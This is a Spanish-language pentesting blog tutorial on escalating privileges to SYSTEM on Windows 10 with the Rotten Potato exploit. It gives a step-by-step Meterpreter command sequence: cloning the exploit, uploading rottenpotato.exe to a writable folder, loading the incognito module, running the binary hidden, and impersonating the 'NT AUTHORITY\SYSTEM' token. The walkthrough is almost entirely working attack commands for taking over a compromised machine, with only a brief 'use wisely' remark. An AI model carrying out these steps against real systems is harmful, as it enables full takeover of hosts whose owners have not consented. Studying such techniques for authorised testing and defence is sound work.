Pentesting ,Hacking y Seguridad informatica

Escalar privilegios con Rotten Potato en entornos Windows

Cuando se logra acceder al sistema el siguiente objetivo es escalar privilegios para comprometer la totalidad del sistema convirtiéndose en una tarea complicada.

Escalar privilegios con Rotten Potato en entornos Windows

Obteniendo rol administrador en una shell con privilegios limitados

1 – Para este ejemplo tenemos una maquina con windows 10 con un shell limitada, primero evidenciamos que el usuario que este activo la shell.

getuid

2 – Evidenciamos que los permisos que tiene el usuario actual son limitados y restringen la ejecución de comandos

getprivs

3 – Intentamos elevar los privilegios con el confiable “getsystem” en el meterpreter (en este caso no resulta exitoso).

getsystem

4 –  Descargamos nuestro exploit desde github para proceder a cargarlo en nuestra maquina comprometida

git clone https://github.com/foxglovesec/RottenPotato.git

5 –  Buscamos en el directorio que recién descargamos, nuestro exploit estará como “rottenpotato.exe”

cd RottenPotato
ls

6 – Nos ubicamos en un directorio en el cual tengamos permisos de escritura en este caso lo subiremos a Public

cd C:\\Users\\Public
pwd

7 –  Ejecutamos la subida del archivo, podemos subirlo de diferentes maneras (FTP o Share) en este caso con upload del meterpreter basta

upload /root/RottenPotato/rottenpotato.exe

8- Primero debemos cargar el modulo incógnito para la impersonalizaron de tokens

use incognito

9 –  Ahora identificamos los tokens que tiene disponible el usuario que tenemos comprometido actualmente, en este caso no tenemos ninguno

list_tokens -u

10 – Ejecutamos nuestra papa podrida para que la magia suceda

execute -Hc -f ./rottenpotato.exe

11 – Después de ejecutado, volvemos a verificar los tokens que tenemos a nuestro alcance

list_tokens -u

12 – Ahora que tenemos el token disponible procedemos a personificar a el administrador del sistema

impersonate_token "NT AUTHORITY\\SYSTEM"

13 – Magia! por ultimo nos queda verificar el usuario activo en la sesión que tenemos abierta.

 

Así de útil puede ser este método para escalar privilegios en Windows, Recuerda utilizar esta información sabiamente.

Gracias a los grandes Stephen Breen y Chris Mallz nos facilitaran las cosas en la fase de post-explotacion!.

Fuente Original: Fox Love Security

saludos!

0x00Sector!!

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *